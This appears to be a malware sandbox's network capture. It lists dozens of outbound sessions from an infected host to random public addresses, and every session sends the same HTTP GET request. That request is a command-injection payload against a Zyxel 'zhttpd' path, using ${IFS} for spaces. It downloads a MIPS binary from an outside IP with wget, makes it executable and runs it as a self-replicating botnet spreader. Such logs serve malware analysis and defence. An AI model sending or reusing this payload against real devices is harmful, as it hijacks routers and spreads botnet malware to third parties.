                                              Jan 29, 2024 07:03:51.027259111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4551192.168.2.145678690.95.66.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027288914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4552192.168.2.1439574134.18.104.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027319908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4553192.168.2.1446410210.204.252.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027358055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4554192.168.2.1447034176.136.153.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027379036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4555192.168.2.1458220123.226.139.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027431011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4556192.168.2.145079269.85.59.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027472973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4557192.168.2.144018624.149.140.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027482033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4558192.168.2.1434006157.57.15.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027530909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4559192.168.2.1455554142.11.55.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027580023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4560192.168.2.1454580169.146.169.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027616024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4561192.168.2.144954079.122.134.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027637005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4562192.168.2.1443326137.12.106.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027678967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4563192.168.2.145156812.194.69.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027726889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4564192.168.2.1441832152.56.77.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027750015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4565192.168.2.14348428.249.232.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027785063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4566192.168.2.145373641.95.123.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027837992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4567192.168.2.1455660204.103.211.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027900934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4568192.168.2.145818278.183.54.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027924061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4569192.168.2.1433804130.202.22.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027955055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4570192.168.2.1446330171.109.243.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028001070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4571192.168.2.14370469.162.183.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028039932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4572192.168.2.1444586211.27.35.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028099060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4573192.168.2.1458432150.226.125.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028127909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4574192.168.2.1439740130.89.201.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028158903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4575192.168.2.145505291.159.254.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028197050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4576192.168.2.1436232193.159.105.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028242111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4577192.168.2.144237486.181.80.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028286934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4578192.168.2.1447758167.179.247.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028331041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4579192.168.2.1443912175.253.226.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028362036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4580192.168.2.144524292.111.162.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028410912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4581192.168.2.1455922197.4.148.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028429031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4582192.168.2.143883039.149.172.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028454065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4583192.168.2.144968836.223.207.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028517008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4584192.168.2.1445434163.145.252.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028549910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4585192.168.2.1444968114.48.58.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028594971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4586192.168.2.1455484129.112.237.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028637886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4587192.168.2.144716478.212.162.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028688908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4588192.168.2.1453974189.47.83.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028721094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4589192.168.2.1460014205.255.5.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028791904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4590192.168.2.1448206103.163.151.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028816938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4591192.168.2.1455800158.237.53.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028855085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4592192.168.2.1446534183.127.40.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028908014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4593192.168.2.1457860185.150.16.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028955936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4594192.168.2.146031250.173.241.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.028994083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4595192.168.2.143625446.167.6.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029030085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4596192.168.2.144336223.131.121.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029081106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4597192.168.2.1450318119.125.62.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029107094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4598192.168.2.1444700213.63.33.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029153109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4599192.168.2.1447394154.55.49.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029176950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4600192.168.2.1451720155.95.110.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029211044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4601192.168.2.1451054172.218.17.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029244900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4602192.168.2.145962012.79.153.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029294014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4603192.168.2.145371635.8.122.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029323101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4604192.168.2.1449518103.19.131.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029366016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4605192.168.2.1460674142.106.86.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029378891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4606192.168.2.143898089.78.34.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029429913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4607192.168.2.144077296.80.156.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029443979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4608192.168.2.1460130168.105.68.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029474020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4609192.168.2.1440402172.177.212.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029517889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4610192.168.2.145007689.89.135.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029558897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4611192.168.2.1456760141.10.164.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029608965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4612192.168.2.1455748181.160.225.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029643059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4613192.168.2.1460358199.137.157.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029675007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4614192.168.2.143623637.46.4.96443
                                              TimestampBytes transferredDirectionData
